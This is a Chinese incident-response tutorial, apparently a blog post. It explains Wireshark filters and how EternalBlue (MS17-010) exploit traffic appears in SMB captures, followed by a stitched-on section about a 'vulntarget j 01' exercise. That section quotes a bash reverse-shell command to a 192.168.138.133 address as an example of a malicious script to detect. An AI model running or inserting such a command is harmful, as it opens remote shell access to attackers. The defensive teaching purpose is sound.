应急响应-流量分析

在应急响应中,有时需要用到流量分析工具,。当需要看到内部流量的具体情况时,就需要我们对网络通信进行抓包,并对数据包进行过滤分析,最常用的工具是Wireshark。

  • Wireshark是一个网络封包分析软件。网络封包分析软件的功能是获取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPcap作为接口,直接与网卡进行数据报文交换。
  • 在打开Wireshark后,需要对要获取流量的网卡进行选择。在选择网卡后,就可以获取相关的数据流量包了,Wireshark界面如图所示。

  • 在应急响应中,对应监听获取后的流量,还需要进行提取过滤。Wireshark的筛选器可以很好地完成这个功能。Wireshark的筛选器可以找出所希望进行分析的数据包。简单来说,筛选器就是定义了一定条件,用来包含或者排除数据包的表达式,从而达到筛选出自己想要的数据包的目的。筛选器也支持与(and)、或(or)、非(not)等逻辑运算符,可以提高筛选效率。
常用的过滤器命令
对特定IP进行过滤
  • 使用【ip.addr == ip】命令,可对特定IP地址进行过滤。对192.168.198.225IP地址进行过滤,如图所示。
对指定的源IP地址进行过滤
  • 使用【ip.src == ip】 命令,可对指定的源IP地址进行过滤。对源IP地址192.168.198.225进行过滤,如图所示。
对协议进行筛选
  • 直接输入HTTP、HTTPS、SMTP、ARP等协议进行筛选,如图所示。
对端口进行过滤
  • 使用【tcp.port == 端口号】或【udp.port ==端口号】命令,可对端口进行过滤。使用【tcp.port==445】命令对445端口进行过滤,如图所示。
对关键字进行检索
  • 使用【tcp contains strings】命令,可对数据包中的关键字进行检索,对流量中包含某一关键字的数据包进行筛选。使用【 tcp contains baidu】命令进行筛选baidu关键字,如图所示。
永痕之蓝利用
  • 以MS17-010流量分析为例,具体介绍相关用法。MS17-010是“永痕之蓝”漏洞,自2017年被曝光后,WannaCry勒索病毒利用此漏洞迅速感染蔓延,引发标志性的安全事件。之后各种恶意软件(无论是勒索病毒,还是挖坑软件),在攻击载荷中都会加入“永痕之蓝”漏洞的攻击方法。
  • 打开一个获取到的MS17-010的流量包,发现其中有SMB协议流量包,如图所示。
  • 因为MS17-010漏洞是通过SMB协议进行攻击的,所以下一步可对SMB协议端口进行筛选。输入【SMB】命令,筛选SMB协议流量,如图所示。
  • 攻击载荷一般会发送NT Trans Request载荷,里面有大量的NOP指令,如图所示。
  • 在发送NT Trans Request载荷后,会发送Trans2 Secondary Request载荷,相关的Trans2 Secondary Request载荷会分几个数据包发送加密的攻击载荷,如图所示。
  • 在攻击载荷发送完后,如果发现数据包中存在Multiplex ID:82数据包,说明漏洞攻击成功,如图所示。
### 应急响应中的漏洞目标与配置信息 在应急响应过程中,针对 `vulntarget j 01` 的配置和漏洞目标分析可以分为以下几个方面: #### 1. 环境概述 此题目所描述的是一个中型环境下的应急响应场景[^1]。其核心目的是通过重现攻击路径来帮助应急人员快速定位并确认受害主机中存在的安全漏洞。 #### 2. 攻击路径还原 为了有效还原攻击路径,通常需要关注以下几点: - **日志文件审查**:检查系统日志(如 `/var/log/auth.log`, `/var/log/syslog`),寻找异常登录记录或其他可疑活动。 - **网络连接状态**:利用命令如 `netstat -anp | grep ESTABLISHED` 或者更高级工具(如 Wireshark)捕获实时流量数据。 - **恶意脚本检测**:例如给定的 Bash 脚本可能被用于建立反向 Shell 连接[^3]: ```bash bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1' ``` #### 3. CMS 实战案例解析 根据提供的 Linux 实战题解,在第五章节提到的具体 Flag 值表明该任务涉及到了某种 Web CMS 漏洞利用过程[^2]。此类问题往往源于未及时更新软件版本或者错误的安全配置。 #### 4. 安全加固建议 基于上述发现,可采取如下措施加强防护能力: - 更新所有已知存在风险的应用程序至最新稳定版; - 关闭不必要的服务端口减少暴露面; - 设置强密码策略并启用双因素认证机制; - 对敏感操作实施访问控制列表(ACL),仅允许授权IP地址范围内的请求进入内部网络区域; #### 结论 综上所述,“vulntarget j 01”的主要工作围绕着识别潜在威胁源以及修复相应的弱点展开。这不仅考验技术实力同时也锻炼逻辑思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值